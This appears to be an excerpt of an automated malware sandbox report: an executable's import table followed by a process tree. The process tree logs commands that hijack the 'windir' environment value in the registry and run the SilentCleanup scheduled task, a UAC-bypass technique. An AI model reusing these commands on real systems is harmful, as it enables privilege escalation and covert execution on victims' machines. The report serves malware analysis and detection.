0x4de574 LoadCursorA
0x4de578 LoadBitmapA
0x4de57c KillTimer
0x4de580 IsZoomed
0x4de584 IsWindowVisible
0x4de588 IsWindowEnabled
0x4de58c IsWindow
0x4de590 IsRectEmpty
0x4de594 IsIconic
0x4de598 IsDialogMessageA
0x4de59c IsChild
0x4de5a0 IsCharAlphaNumericA
0x4de5a4 IsCharAlphaA
0x4de5a8 InvalidateRect
0x4de5ac IntersectRect
0x4de5b0 InsertMenuItemA
0x4de5b4 InsertMenuA
0x4de5b8 InflateRect
0x4de5c0 GetWindowTextA
0x4de5c4 GetWindowRect
0x4de5c8 GetWindowPlacement
0x4de5cc GetWindowLongA
0x4de5d0 GetWindowDC
0x4de5d4 GetTopWindow
0x4de5d8 GetSystemMetrics
0x4de5dc GetSystemMenu
0x4de5e0 GetSysColorBrush
0x4de5e4 GetSysColor
0x4de5e8 GetSubMenu
0x4de5ec GetScrollRange
0x4de5f0 GetScrollPos
0x4de5f4 GetScrollInfo
0x4de5f8 GetPropA
0x4de5fc GetParent
0x4de600 GetWindow
0x4de604 GetMessageTime
0x4de608 GetMenuStringA
0x4de60c GetMenuState
0x4de610 GetMenuItemInfoA
0x4de614 GetMenuItemID
0x4de618 GetMenuItemCount
0x4de61c GetMenu
0x4de620 GetLastActivePopup
0x4de624 GetKeyboardState
0x4de62c GetKeyboardLayout
0x4de630 GetKeyState
0x4de634 GetKeyNameTextA
0x4de638 GetIconInfo
0x4de63c GetForegroundWindow
0x4de640 GetFocus
0x4de644 GetDoubleClickTime
0x4de648 GetDesktopWindow
0x4de64c GetDCEx
0x4de650 GetDC
0x4de654 GetCursorPos
0x4de658 GetCursor
0x4de65c GetClipboardData
0x4de660 GetClientRect
0x4de664 GetClassNameA
0x4de668 GetClassInfoA
0x4de66c GetCaretPos
0x4de670 GetCapture
0x4de674 GetActiveWindow
0x4de678 FrameRect
0x4de67c FindWindowA
0x4de680 FillRect
0x4de684 EqualRect
0x4de688 EnumWindows
0x4de68c EnumThreadWindows
0x4de694 EndPaint
0x4de698 EnableWindow
0x4de69c EnableScrollBar
0x4de6a0 EnableMenuItem
0x4de6a4 EmptyClipboard
0x4de6a8 DrawTextA
0x4de6ac DrawMenuBar
0x4de6b0 DrawIconEx
0x4de6b4 DrawIcon
0x4de6b8 DrawFrameControl
0x4de6bc DrawFocusRect
0x4de6c0 DrawEdge
0x4de6c4 DispatchMessageA
0x4de6c8 DestroyWindow
0x4de6cc DestroyMenu
0x4de6d0 DestroyIcon
0x4de6d4 DestroyCursor
0x4de6d8 DeleteMenu
0x4de6dc DefWindowProcA
0x4de6e0 DefMDIChildProcA
0x4de6e4 DefFrameProcA
0x4de6e8 CreatePopupMenu
0x4de6ec CreateMenu
0x4de6f0 CreateIcon
0x4de6f4 CloseClipboard
0x4de6f8 ClientToScreen
0x4de6fc CheckMenuItem
0x4de700 CallWindowProcA
0x4de704 CallNextHookEx
0x4de708 BeginPaint
0x4de70c CharNextA
0x4de710 CharLowerBuffA
0x4de714 CharLowerA
0x4de718 CharUpperBuffA
0x4de71c CharToOemA
0x4de720 AdjustWindowRectEx
Library kernel32.dll:
0x4de72c Sleep
Library oleaut32.dll:
0x4de734 SafeArrayPtrOfIndex
0x4de738 SafeArrayGetUBound
0x4de73c SafeArrayGetLBound
0x4de740 SafeArrayCreate
0x4de744 VariantChangeType
0x4de748 VariantCopy
0x4de74c VariantClear
0x4de750 VariantInit
Library comctl32.dll:
0x4de760 ImageList_Write
0x4de764 ImageList_Read
0x4de774 ImageList_DragMove
0x4de778 ImageList_DragLeave
0x4de77c ImageList_DragEnter
0x4de780 ImageList_EndDrag
0x4de784 ImageList_BeginDrag
0x4de788 ImageList_Remove
0x4de78c ImageList_DrawEx
0x4de790 ImageList_Draw
0x4de7a0 ImageList_Add
0x4de7ac ImageList_Destroy
0x4de7b0 ImageList_Create
Library kernel32.dll:
0x4de7b8 MulDiv

This file is not on VirusTotal.

Process Tree

  • iz3Ehm6t.exe 1964
    • cmd.exe 1340 cmd /c ""C:\Users\Public\Natso.bat" "
      • reg.exe 2352 reg delete hkcu\Environment /v windir /f
      • reg.exe 1592 reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
      • schtasks.exe 2212 schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      • reg.exe 2192 reg delete hkcu\Environment /v windir /f
    • cmd.exe 2444 cmd /c ""C:\Users\Public\Yeso.bat" "
    • ieinstal.exe 1540
  • svchost.exe 816 C:\Windows\system32\svchost.exe -k netsvcs

iz3Ehm6t.exe, PID: 1964, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe
Command Line: "C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe"
cmd.exe, PID: 1340, Parent PID: 1964
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\Public\Natso.bat" "
reg.exe, PID: 2352, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\reg.exe
Command Line: reg delete hkcu\Environment /v windir /f
reg.exe, PID: 1592, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\reg.exe
Command Line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
schtasks.exe, PID: 2212, Parent PID: 1340
Full Path: C:\Windows\SysWOW64\schtasks.exe
Command Line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
svchost.exe, PID: 816, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs